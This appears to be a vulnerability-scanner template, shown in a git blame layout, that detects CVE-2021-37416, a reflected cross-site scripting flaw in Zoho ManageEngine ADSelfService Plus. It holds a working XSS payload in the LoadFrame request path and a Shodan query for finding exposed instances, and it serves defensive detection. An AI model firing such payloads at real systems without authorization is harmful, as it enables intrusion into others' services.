2022-05-09 09:51:53 +00:00
|
|
|
id: CVE-2021-37416
|
|
|
|
|
|
|
|
info:
|
2022-08-29 13:55:23 +00:00
|
|
|
name: Zoho ManageEngine ADSelfService Plus <=6103 - Cross-Site Scripting
|
2022-05-09 09:51:53 +00:00
|
|
|
author: edoardottt
|
|
|
|
severity: medium
|
2022-08-29 13:55:23 +00:00
|
|
|
description: Zoho ManageEngine ADSelfService Plus 6103 and prior contains a reflected cross-site scripting vulnerability on the loadframe page.
|
2023-09-06 12:09:01 +00:00
|
|
|
remediation: |
|
|
|
|
Upgrade to a patched version of Zoho ManageEngine ADSelfService Plus (version >6103) to mitigate this vulnerability.
|
2022-08-29 13:55:23 +00:00
|
|
|
reference:
|
|
|
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37416
|
|
|
|
- https://blog.stmcyber.com/vulns/cve-2021-37416/
|
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-37416
|
2022-05-09 09:51:53 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
|
|
cvss-score: 6.1
|
|
|
|
cve-id: CVE-2021-37416
|
|
|
|
cwe-id: CWE-79
|
2023-04-12 10:55:48 +00:00
|
|
|
epss-score: 0.00118
|
2023-10-18 16:26:30 +00:00
|
|
|
epss-percentile: 0.45492
|
2023-09-06 12:09:01 +00:00
|
|
|
cpe: cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:*:*:*:*:*:*:*:*
|
2022-05-09 09:51:53 +00:00
|
|
|
metadata:
|
2023-06-04 08:13:42 +00:00
|
|
|
verified: true
|
2023-09-06 12:09:01 +00:00
|
|
|
max-request: 1
|
2023-07-11 19:49:27 +00:00
|
|
|
vendor: zohocorp
|
|
|
|
product: manageengine_adselfservice_plus
|
2023-09-06 12:09:01 +00:00
|
|
|
shodan-query: http.title:"ManageEngine"
|
2023-04-12 10:55:48 +00:00
|
|
|
tags: cve,cve2021,zoho,xss
|
2022-05-09 09:51:53 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2022-05-09 09:51:53 +00:00
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/LoadFrame?frame_name=x&src=x&single_signout=x%27%3E%3C/iframe%3E%3Cscript%3Ealert(1)%3C/script%3E"
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
part: header
|
|
|
|
words:
|
|
|
|
- "text/html"
|
|
|
|
|
|
|
|
- type: word
|
|
|
|
part: body
|
|
|
|
words:
|
|
|
|
- "></iframe><script>alert(1)</script>"
|
|
|
|
- "adsf/js/"
|
2022-08-29 13:55:23 +00:00
|
|
|
condition: and
|
2023-07-11 19:49:27 +00:00
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|